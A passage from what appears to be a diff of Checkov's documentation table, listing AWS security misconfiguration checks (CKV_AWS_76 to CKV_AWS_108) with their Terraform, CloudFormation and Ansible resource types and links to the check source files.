-|  326 | CKV_AWS_76               | resource                         | AWS::ApiGateway::Stage                                                                           | Ensure API Gateway has Access Logging enabled                                                                                                                                                            | Cloudformation          | [APIGatewayAccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayAccessLogging.py)                                                                    |
-|  327 | CKV_AWS_76               | resource                         | AWS::Serverless::Api                                                                             | Ensure API Gateway has Access Logging enabled                                                                                                                                                            | Cloudformation          | [APIGatewayAccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayAccessLogging.py)                                                                    |
-|  328 | CKV_AWS_76               | resource                         | aws_api_gateway_stage                                                                            | Ensure API Gateway has Access Logging enabled                                                                                                                                                            | Terraform               | [APIGatewayAccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayAccessLogging.py)                                                                         |
-|  329 | CKV_AWS_76               | resource                         | aws_apigatewayv2_stage                                                                           | Ensure API Gateway has Access Logging enabled                                                                                                                                                            | Terraform               | [APIGatewayAccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayAccessLogging.py)                                                                         |
-|  330 | CKV_AWS_77               | resource                         | aws_athena_database                                                                              | Ensure Athena Database is encrypted at rest (default is unencrypted)                                                                                                                                     | Terraform               | [AthenaDatabaseEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AthenaDatabaseEncryption.py)                                                                       |
-|  331 | CKV_AWS_78               | resource                         | AWS::CodeBuild::Project                                                                          | Ensure that CodeBuild Project encryption is not disabled                                                                                                                                                 | Cloudformation          | [CodeBuildProjectEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CodeBuildProjectEncryption.py)                                                              |
-|  332 | CKV_AWS_78               | resource                         | aws_codebuild_project                                                                            | Ensure that CodeBuild Project encryption is not disabled                                                                                                                                                 | Terraform               | [CodeBuildProjectEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodeBuildProjectEncryption.py)                                                                   |
-|  333 | CKV_AWS_79               | resource                         | AWS::EC2::LaunchTemplate                                                                         | Ensure Instance Metadata Service Version 1 is not enabled                                                                                                                                                | Cloudformation          | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IMDSv1Disabled.py)                                                                                      |
-|  334 | CKV_AWS_79               | resource                         | aws_instance                                                                                     | Ensure Instance Metadata Service Version 1 is not enabled                                                                                                                                                | Terraform               | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IMDSv1Disabled.py)                                                                                           |
-|  335 | CKV_AWS_79               | resource                         | aws_launch_configuration                                                                         | Ensure Instance Metadata Service Version 1 is not enabled                                                                                                                                                | Terraform               | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IMDSv1Disabled.py)                                                                                           |
-|  336 | CKV_AWS_79               | resource                         | aws_launch_template                                                                              | Ensure Instance Metadata Service Version 1 is not enabled                                                                                                                                                | Terraform               | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IMDSv1Disabled.py)                                                                                           |
-|  337 | CKV_AWS_80               | resource                         | aws_msk_cluster                                                                                  | Ensure MSK Cluster logging is enabled                                                                                                                                                                    | Terraform               | [MSKClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MSKClusterLogging.py)                                                                                     |
-|  338 | CKV_AWS_81               | resource                         | aws_msk_cluster                                                                                  | Ensure MSK Cluster encryption in rest and transit is enabled                                                                                                                                             | Terraform               | [MSKClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MSKClusterEncryption.py)                                                                               |
-|  339 | CKV_AWS_82               | resource                         | AWS::Athena::WorkGroup                                                                           | Ensure Athena Workgroup should enforce configuration to prevent client disabling encryption                                                                                                              | Cloudformation          | [AthenaWorkgroupConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AthenaWorkgroupConfiguration.py)                                                          |
-|  340 | CKV_AWS_82               | resource                         | aws_athena_workgroup                                                                             | Ensure Athena Workgroup should enforce configuration to prevent client disabling encryption                                                                                                              | Terraform               | [AthenaWorkgroupConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AthenaWorkgroupConfiguration.py)                                                               |
-|  341 | CKV_AWS_83               | resource                         | AWS::Elasticsearch::Domain                                                                       | Ensure Elasticsearch Domain enforces HTTPS                                                                                                                                                               | Cloudformation          | [ElasticsearchDomainEnforceHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainEnforceHTTPS.py)                                                    |
-|  342 | CKV_AWS_83               | resource                         | aws_elasticsearch_domain                                                                         | Ensure Elasticsearch Domain enforces HTTPS                                                                                                                                                               | Terraform               | [ElasticsearchDomainEnforceHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainEnforceHTTPS.py)                                                         |
-|  343 | CKV_AWS_83               | resource                         | aws_opensearch_domain                                                                            | Ensure Elasticsearch Domain enforces HTTPS                                                                                                                                                               | Terraform               | [ElasticsearchDomainEnforceHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainEnforceHTTPS.py)                                                         |
-|  344 | CKV_AWS_84               | resource                         | AWS::Elasticsearch::Domain                                                                       | Ensure Elasticsearch Domain Logging is enabled                                                                                                                                                           | Cloudformation          | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainLogging.py)                                                              |
-|  345 | CKV_AWS_84               | resource                         | AWS::OpenSearchService::Domain                                                                   | Ensure Elasticsearch Domain Logging is enabled                                                                                                                                                           | Cloudformation          | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainLogging.py)                                                              |
-|  346 | CKV_AWS_84               | resource                         | aws_elasticsearch_domain                                                                         | Ensure Elasticsearch Domain Logging is enabled                                                                                                                                                           | Terraform               | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainLogging.py)                                                                   |
-|  347 | CKV_AWS_84               | resource                         | aws_opensearch_domain                                                                            | Ensure Elasticsearch Domain Logging is enabled                                                                                                                                                           | Terraform               | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainLogging.py)                                                                   |
-|  348 | CKV_AWS_85               | resource                         | AWS::DocDB::DBCluster                                                                            | Ensure DocumentDB Logging is enabled                                                                                                                                                                     | Cloudformation          | [DocDBLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBLogging.py)                                                                                          |
-|  349 | CKV_AWS_85               | resource                         | aws_docdb_cluster                                                                                | Ensure DocumentDB Logging is enabled                                                                                                                                                                     | Terraform               | [DocDBLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBLogging.py)                                                                                               |
-|  350 | CKV_AWS_86               | resource                         | AWS::CloudFront::Distribution                                                                    | Ensure CloudFront Distribution has Access Logging enabled                                                                                                                                                | Cloudformation          | [CloudfrontDistributionLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudfrontDistributionLogging.py)                                                        |
-|  351 | CKV_AWS_86               | resource                         | aws_cloudfront_distribution                                                                      | Ensure CloudFront distribution has Access Logging enabled                                                                                                                                                | Terraform               | [CloudfrontDistributionLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionLogging.py)                                                             |
-|  352 | CKV_AWS_87               | resource                         | AWS::Redshift::Cluster                                                                           | Redshift cluster should not be publicly accessible                                                                                                                                                       | Cloudformation          | [RedshiftClusterPubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedshiftClusterPubliclyAccessible.py)                                                |
-|  353 | CKV_AWS_87               | resource                         | aws_redshift_cluster                                                                             | Redshift cluster should not be publicly accessible                                                                                                                                                       | Terraform               | [RedshitClusterPubliclyAvailable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshitClusterPubliclyAvailable.py)                                                         |
-|  354 | CKV_AWS_88               | resource                         | AWS::EC2::Instance                                                                               | EC2 instance should not have public IP.                                                                                                                                                                  | Cloudformation          | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EC2PublicIP.py)                                                                                            |
-|  355 | CKV_AWS_88               | resource                         | AWS::EC2::LaunchTemplate                                                                         | EC2 instance should not have public IP.                                                                                                                                                                  | Cloudformation          | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EC2PublicIP.py)                                                                                            |
-|  356 | CKV_AWS_88               | resource                         | [?"amazon.aws.ec2_instance" != null][]                                                           | EC2 instance should not have public IP.                                                                                                                                                                  | Ansible                 | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py)                                                                                                       |
-|  357 | CKV_AWS_88               | resource                         | [?"ec2_instance" != null][]                                                                      | EC2 instance should not have public IP.                                                                                                                                                                  | Ansible                 | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py)                                                                                                       |
-|  358 | CKV_AWS_88               | resource                         | [].block[?"amazon.aws.ec2_instance" != null][]                                                   | EC2 instance should not have public IP.                                                                                                                                                                  | Ansible                 | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py)                                                                                                       |
-|  359 | CKV_AWS_88               | resource                         | [].block[?"ec2_instance" != null][]                                                              | EC2 instance should not have public IP.                                                                                                                                                                  | Ansible                 | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py)                                                                                                       |
-|  360 | CKV_AWS_88               | resource                         | [].block[].block[?"amazon.aws.ec2_instance" != null][]                                           | EC2 instance should not have public IP.                                                                                                                                                                  | Ansible                 | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py)                                                                                                       |
-|  361 | CKV_AWS_88               | resource                         | [].block[].block[?"ec2_instance" != null][]                                                      | EC2 instance should not have public IP.                                                                                                                                                                  | Ansible                 | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py)                                                                                                       |
-|  362 | CKV_AWS_88               | resource                         | [].block[].block[].block[?"amazon.aws.ec2_instance" != null][]                                   | EC2 instance should not have public IP.                                                                                                                                                                  | Ansible                 | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py)                                                                                                       |
-|  363 | CKV_AWS_88               | resource                         | [].block[].block[].block[?"ec2_instance" != null][]                                              | EC2 instance should not have public IP.                                                                                                                                                                  | Ansible                 | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py)                                                                                                       |
-|  364 | CKV_AWS_88               | resource                         | [].tasks[?"amazon.aws.ec2_instance" != null][]                                                   | EC2 instance should not have public IP.                                                                                                                                                                  | Ansible                 | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py)                                                                                                       |
-|  365 | CKV_AWS_88               | resource                         | [].tasks[?"ec2_instance" != null][]                                                              | EC2 instance should not have public IP.                                                                                                                                                                  | Ansible                 | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py)                                                                                                       |
-|  366 | CKV_AWS_88               | resource                         | [].tasks[].block[?"amazon.aws.ec2_instance" != null][]                                           | EC2 instance should not have public IP.                                                                                                                                                                  | Ansible                 | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py)                                                                                                       |
-|  367 | CKV_AWS_88               | resource                         | [].tasks[].block[?"ec2_instance" != null][]                                                      | EC2 instance should not have public IP.                                                                                                                                                                  | Ansible                 | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py)                                                                                                       |
-|  368 | CKV_AWS_88               | resource                         | [].tasks[].block[].block[?"amazon.aws.ec2_instance" != null][]                                   | EC2 instance should not have public IP.                                                                                                                                                                  | Ansible                 | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py)                                                                                                       |
-|  369 | CKV_AWS_88               | resource                         | [].tasks[].block[].block[?"ec2_instance" != null][]                                              | EC2 instance should not have public IP.                                                                                                                                                                  | Ansible                 | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py)                                                                                                       |
-|  370 | CKV_AWS_88               | resource                         | [].tasks[].block[].block[].block[?"amazon.aws.ec2_instance" != null][]                           | EC2 instance should not have public IP.                                                                                                                                                                  | Ansible                 | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py)                                                                                                       |
-|  371 | CKV_AWS_88               | resource                         | [].tasks[].block[].block[].block[?"ec2_instance" != null][]                                      | EC2 instance should not have public IP.                                                                                                                                                                  | Ansible                 | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py)                                                                                                       |
-|  372 | CKV_AWS_88               | resource                         | aws_instance                                                                                     | EC2 instance should not have public IP.                                                                                                                                                                  | Terraform               | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2PublicIP.py)                                                                                                 |
-|  373 | CKV_AWS_88               | resource                         | aws_launch_template                                                                              | EC2 instance should not have public IP.                                                                                                                                                                  | Terraform               | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2PublicIP.py)                                                                                                 |
-|  374 | CKV_AWS_89               | resource                         | AWS::DMS::ReplicationInstance                                                                    | DMS replication instance should not be publicly accessible                                                                                                                                               | Cloudformation          | [DMSReplicationInstancePubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DMSReplicationInstancePubliclyAccessible.py)                                  |
-|  375 | CKV_AWS_89               | resource                         | aws_dms_replication_instance                                                                     | DMS replication instance should not be publicly accessible                                                                                                                                               | Terraform               | [DMSReplicationInstancePubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSReplicationInstancePubliclyAccessible.py)                                       |
-|  376 | CKV_AWS_90               | resource                         | AWS::DocDB::DBClusterParameterGroup                                                              | Ensure DocumentDB TLS is not disabled                                                                                                                                                                    | Cloudformation          | [DocDBTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBTLS.py)                                                                                                  |
-|  377 | CKV_AWS_90               | resource                         | aws_docdb_cluster_parameter_group                                                                | Ensure DocumentDB TLS is not disabled                                                                                                                                                                    | Terraform               | [DocDBTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBTLS.py)                                                                                                       |
-|  378 | CKV_AWS_91               | resource                         | AWS::ElasticLoadBalancingV2::LoadBalancer                                                        | Ensure the ELBv2 (Application/Network) has access logging enabled                                                                                                                                        | Cloudformation          | [ELBv2AccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ELBv2AccessLogs.py)                                                                                    |
-|  379 | CKV_AWS_91               | resource                         | aws_alb                                                                                          | Ensure the ELBv2 (Application/Network) has access logging enabled                                                                                                                                        | Terraform               | [ELBv2AccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBv2AccessLogs.py)                                                                                         |
-|  380 | CKV_AWS_91               | resource                         | aws_lb                                                                                           | Ensure the ELBv2 (Application/Network) has access logging enabled                                                                                                                                        | Terraform               | [ELBv2AccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBv2AccessLogs.py)                                                                                         |
-|  381 | CKV_AWS_92               | resource                         | AWS::ElasticLoadBalancing::LoadBalancer                                                          | Ensure the ELB has access logging enabled                                                                                                                                                                | Cloudformation          | [ELBAccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ELBAccessLogs.py)                                                                                        |
-|  382 | CKV_AWS_92               | resource                         | aws_elb                                                                                          | Ensure the ELB has access logging enabled                                                                                                                                                                | Terraform               | [ELBAccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBAccessLogs.py)                                                                                             |
-|  383 | CKV_AWS_93               | resource                         | aws_s3_bucket                                                                                    | Ensure S3 bucket policy does not lockout all but root user. (Prevent lockouts needing root account fixes)                                                                                                | Terraform               | [S3ProtectAgainstPolicyLockout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3ProtectAgainstPolicyLockout.py)                                                             |
-|  384 | CKV_AWS_93               | resource                         | aws_s3_bucket_policy                                                                             | Ensure S3 bucket policy does not lockout all but root user. (Prevent lockouts needing root account fixes)                                                                                                | Terraform               | [S3ProtectAgainstPolicyLockout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3ProtectAgainstPolicyLockout.py)                                                             |
-|  385 | CKV_AWS_94               | resource                         | AWS::Glue::DataCatalogEncryptionSettings                                                         | Ensure Glue Data Catalog Encryption is enabled                                                                                                                                                           | Cloudformation          | [GlueDataCatalogEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueDataCatalogEncryption.py)                                                                |
-|  386 | CKV_AWS_94               | resource                         | aws_glue_data_catalog_encryption_settings                                                        | Ensure Glue Data Catalog Encryption is enabled                                                                                                                                                           | Terraform               | [GlueDataCatalogEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueDataCatalogEncryption.py)                                                                     |
-|  387 | CKV_AWS_95               | resource                         | AWS::ApiGatewayV2::Stage                                                                         | Ensure API Gateway V2 has Access Logging enabled                                                                                                                                                         | Cloudformation          | [APIGatewayV2AccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayV2AccessLogging.py)                                                                |
-|  388 | CKV_AWS_95               | resource                         | AWS::Serverless::HttpApi                                                                         | Ensure API Gateway V2 has Access Logging enabled                                                                                                                                                         | Cloudformation          | [APIGatewayV2AccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayV2AccessLogging.py)                                                                |
-|  389 | CKV_AWS_96               | resource                         | AWS::RDS::DBCluster                                                                              | Ensure all data stored in Aurora is securely encrypted at rest                                                                                                                                           | Cloudformation          | [AuroraEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AuroraEncryption.py)                                                                                  |
-|  390 | CKV_AWS_96               | resource                         | aws_rds_cluster                                                                                  | Ensure all data stored in Aurora is securely encrypted at rest                                                                                                                                           | Terraform               | [AuroraEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AuroraEncryption.py)                                                                                       |
-|  391 | CKV_AWS_97               | resource                         | AWS::ECS::TaskDefinition                                                                         | Ensure Encryption in transit is enabled for EFS volumes in ECS Task definitions                                                                                                                          | Cloudformation          | [ECSTaskDefinitionEFSVolumeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECSTaskDefinitionEFSVolumeEncryption.py)                                          |
-|  392 | CKV_AWS_97               | resource                         | aws_ecs_task_definition                                                                          | Ensure Encryption in transit is enabled for EFS volumes in ECS Task definitions                                                                                                                          | Terraform               | [ECSTaskDefinitionEFSVolumeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSTaskDefinitionEFSVolumeEncryption.py)                                               |
-|  393 | CKV_AWS_98               | resource                         | aws_sagemaker_endpoint_configuration                                                             | Ensure all data stored in the Sagemaker Endpoint is securely encrypted at rest                                                                                                                           | Terraform               | [SagemakerEndpointConfigurationEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerEndpointConfigurationEncryption.py)                                       |
-|  394 | CKV_AWS_99               | resource                         | AWS::Glue::SecurityConfiguration                                                                 | Ensure Glue Security Configuration Encryption is enabled                                                                                                                                                 | Cloudformation          | [GlueSecurityConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfiguration.py)                                                                |
-|  395 | CKV_AWS_99               | resource                         | aws_glue_security_configuration                                                                  | Ensure Glue Security Configuration Encryption is enabled                                                                                                                                                 | Terraform               | [GlueSecurityConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfiguration.py)                                                                     |
-|  396 | CKV_AWS_100              | resource                         | AWS::EKS::Nodegroup                                                                              | Ensure AWS EKS node group does not have implicit SSH access from 0.0.0.0/0                                                                                                                               | Cloudformation          | [EKSNodeGroupRemoteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EKSNodeGroupRemoteAccess.py)                                                                  |
-|  397 | CKV_AWS_100              | resource                         | aws_eks_node_group                                                                               | Ensure AWS EKS node group does not have implicit SSH access from 0.0.0.0/0                                                                                                                               | Terraform               | [EKSNodeGroupRemoteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSNodeGroupRemoteAccess.py)                                                                       |
-|  398 | CKV_AWS_101              | resource                         | AWS::Neptune::DBCluster                                                                          | Ensure Neptune logging is enabled                                                                                                                                                                        | Cloudformation          | [NeptuneClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/NeptuneClusterLogging.py)                                                                        |
-|  399 | CKV_AWS_101              | resource                         | aws_neptune_cluster                                                                              | Ensure Neptune logging is enabled                                                                                                                                                                        | Terraform               | [NeptuneClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterLogging.py)                                                                             |
-|  400 | CKV_AWS_102              | resource                         | aws_neptune_cluster_instance                                                                     | Ensure Neptune Cluster instance is not publicly available                                                                                                                                                | Terraform               | [NeptuneClusterInstancePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterInstancePublic.py)                                                               |
-|  401 | CKV_AWS_103              | resource                         | AWS::ElasticLoadBalancingV2::Listener                                                            | Ensure that Load Balancer Listener is using at least TLS v1.2                                                                                                                                            | Cloudformation          | [ALBListenerTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ALBListenerTLS12.py)                                                                                  |
-|  402 | CKV_AWS_103              | resource                         | aws_alb_listener                                                                                 | Ensure that load balancer is using at least TLS 1.2                                                                                                                                                      | Terraform               | [AppLoadBalancerTLS12.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppLoadBalancerTLS12.yaml)                                                                       |
-|  403 | CKV_AWS_103              | resource                         | aws_lb                                                                                           | Ensure that load balancer is using at least TLS 1.2                                                                                                                                                      | Terraform               | [AppLoadBalancerTLS12.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppLoadBalancerTLS12.yaml)                                                                       |
-|  404 | CKV_AWS_103              | resource                         | aws_lb_listener                                                                                  | Ensure that load balancer is using at least TLS 1.2                                                                                                                                                      | Terraform               | [AppLoadBalancerTLS12.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppLoadBalancerTLS12.yaml)                                                                       |
-|  405 | CKV_AWS_104              | resource                         | AWS::DocDB::DBClusterParameterGroup                                                              | Ensure DocumentDB has audit logs enabled                                                                                                                                                                 | Cloudformation          | [DocDBAuditLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBAuditLogs.py)                                                                                      |
-|  406 | CKV_AWS_104              | resource                         | aws_docdb_cluster_parameter_group                                                                | Ensure DocumentDB has audit logs enabled                                                                                                                                                                 | Terraform               | [DocDBAuditLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBAuditLogs.py)                                                                                           |
-|  407 | CKV_AWS_105              | resource                         | AWS::Redshift::ClusterParameterGroup                                                             | Ensure Redshift uses SSL                                                                                                                                                                                 | Cloudformation          | [RedShiftSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedShiftSSL.py)                                                                                            |
-|  408 | CKV_AWS_105              | resource                         | aws_redshift_parameter_group                                                                     | Ensure Redshift uses SSL                                                                                                                                                                                 | Terraform               | [RedShiftSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedShiftSSL.py)                                                                                                 |
-|  409 | CKV_AWS_106              | resource                         | aws_ebs_encryption_by_default                                                                    | Ensure EBS default encryption is enabled                                                                                                                                                                 | Terraform               | [EBSDefaultEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSDefaultEncryption.py)                                                                               |
-|  410 | CKV_AWS_107              | resource                         | AWS::IAM::Group                                                                                  | Ensure IAM policies does not allow credentials exposure                                                                                                                                                  | Cloudformation          | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py)                                                                      |
-|  411 | CKV_AWS_107              | resource                         | AWS::IAM::ManagedPolicy                                                                          | Ensure IAM policies does not allow credentials exposure                                                                                                                                                  | Cloudformation          | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py)                                                                      |
-|  412 | CKV_AWS_107              | resource                         | AWS::IAM::Policy                                                                                 | Ensure IAM policies does not allow credentials exposure                                                                                                                                                  | Cloudformation          | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py)                                                                      |
-|  413 | CKV_AWS_107              | resource                         | AWS::IAM::Role                                                                                   | Ensure IAM policies does not allow credentials exposure                                                                                                                                                  | Cloudformation          | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py)                                                                      |
-|  414 | CKV_AWS_107              | resource                         | AWS::IAM::User                                                                                   | Ensure IAM policies does not allow credentials exposure                                                                                                                                                  | Cloudformation          | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py)                                                                      |
-|  415 | CKV_AWS_107              | data                             | aws_iam_policy_document                                                                          | Ensure IAM policies does not allow credentials exposure                                                                                                                                                  | Terraform               | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMCredentialsExposure.py)                                                                               |
-|  416 | CKV_AWS_108              | resource                         | AWS::IAM::Group                                                                                  | Ensure IAM policies does not allow data exfiltration                                                                                                                                                     | Cloudformation          | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py)                                                                            |
-|  417 | CKV_AWS_108              | resource                         | AWS::IAM::ManagedPolicy                                                                          | Ensure IAM policies does not allow data exfiltration                                                                                                                                                     | Cloudformation          | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py)                                                                            |
-|  418 | CKV_AWS_108              | resource                         | AWS::IAM::Policy                                                                                 | Ensure IAM policies does not allow data exfiltration                                                                                                                                                     | Cloudformation          | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py)                                                                            |
-|  419 | CKV_AWS_108              | resource                         | AWS::IAM::Role                                                                                   | Ensure IAM policies does not allow data exfiltration                                                                                                                                                     | Cloudformation          | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py)                                                                            |
-|  420 | CKV_AWS_108              | resource                         | AWS::IAM::User                                                                                   | Ensure IAM policies does not allow data exfiltration                                                                                                                                                     | Cloudformation          | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py)                                                                            |
